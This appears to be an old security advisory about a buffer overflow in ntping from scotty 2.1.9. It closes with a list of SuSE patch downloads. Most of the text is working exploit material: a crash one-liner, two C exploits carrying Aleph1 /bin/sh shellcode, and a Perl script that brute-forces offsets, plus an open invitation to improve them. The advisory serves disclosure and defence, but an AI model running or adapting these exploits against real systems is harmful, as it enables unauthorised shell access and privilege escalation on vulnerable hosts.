COMMAND

    scotty (ntping)

SYSTEMS AFFECTED

    scotty (ntping)

PROBLEM

    'KF' found following:

        [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
        Segmentation fault (core dumped)

    Here is  an exploit  ppl were  toying with.   Perhaps someone with
    better overflow skills  can tweak it  a bit.   Larry W. Cashdollar
    got it to  spit out a  shell at various  offsets, you can  use the
    brute.pl script to automate the process (tested Mandrake 8.0).

    Code:

    /*Larry W. Cashdollar                6/13/2001
      http://vapid.dhs.org               Vapid Labs
      Overflows ntping for scotty-2.1.9 based on post by
      dotslash@snosoft.com*/

    #include <stdio.h>
    #include <stdlib.h>

    #define NOP 0x90		/*no operation skip to next instruction. */
    #define LEN 798			/*our buffersize. */

    /*lacks a call to setuid(0)*/
    char shellcode[]= /*Aleph1's shell code. */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /*Nab the stack pointer to use as an index into our nop's*/
    long
    get_sp ()
    {
      __asm__ ("mov %esp, %eax");
    }

    int
    main (int argc, char *argv[])
    {
      char buffer[LEN];
      int i;

      long retaddr = get_sp ();

    /*Fill the buffer with our new address to jump to esp + offset */
      for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + atoi (argv[1]);

    /*copy the NOPs  in to the buffer leaving space for shellcode and
    pointers*/

      printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);

      for (i = 550; i < (LEN - strlen (shellcode) - 50); i++)
        *(buffer + i) = NOP;

    /*copy the shell code into the buffer*/
      memcpy (buffer + i, shellcode, strlen (shellcode));

      execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

    }

    brute.pl:

    #!/usr/bin/perl

    $X=50;

    while ($X<= 1000) {
    system("./wp $X");
    print "$X\n";
    $X= $X+1;

    }

    Larry W. Cashdollar did his version of exploit available at:

        http://vapid.dhs.org/ntping_exp.c

    Here it is:

    /*Larry W. Cashdollar                6/13/2001
      http://vapid.dhs.org               Vapid Labs
      Overflows ntping for scotty-2.1.9 based on post by
      dotslash@snosoft.com
      doesnt give root, prives are dropped.  Unless ntping has setgid bit set.*/

    #include <stdio.h>
    #include <stdlib.h>

    #define NOP 0x90		/*no operation skip to next instruction. */
    #define LEN 590			/*our buffersize. */

    /*lacks a call to setuid(0)*/
    char shellcode[]= /*Aleph1's shell code. */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /*Nab the stack pointer to use as an index into our nop's*/
    long
    get_sp ()
    {
      __asm__ ("mov %esp, %eax");
    }

    int
    main (int argc, char *argv[])
    {
      char buffer[LEN];
      int i;

      long retaddr = get_sp ();

    /*Fill the buffer with our new address to jump to esp + offset */
      for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + atoi (argv[1]);

    /*copy the NOPs  in to the buffer leaving space for shellcode and pointers*/

      printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);
    /*
      for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
        *(buffer + i) = NOP;*/

    /*copy the shell code into the buffer*/
      memcpy (buffer + i, shellcode, strlen (shellcode));

      execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

    }

SOLUTION

    Fixed in scotty 2.1.11.  For SuSE:

        ftp://ftp.suse.com/pub/suse/i386/update/7.0/tcl2/scotty-2.1.10-315.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/scotty-2.1.10-315.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/tcl2/scotty-2.1.10-314.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/scotty-2.1.10-314.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/tcl2/scotty-2.1.10-314.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/scotty-2.1.10-314.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/tcl2/scotty-2.1.10-268.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/scotty-2.1.10-268.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/tcl2/scotty-2.1.10-273.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/scotty-2.1.10-273.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/tcl2/scotty-2.1.10-272.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/scotty-2.1.10-272.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/tcl2/scotty-2.1.10-274.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/scotty-2.1.10-274.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/tcl2/scotty-2.1.10-274.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/scotty-2.1.10-274.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/scotty-2.1.10-274.src.rpm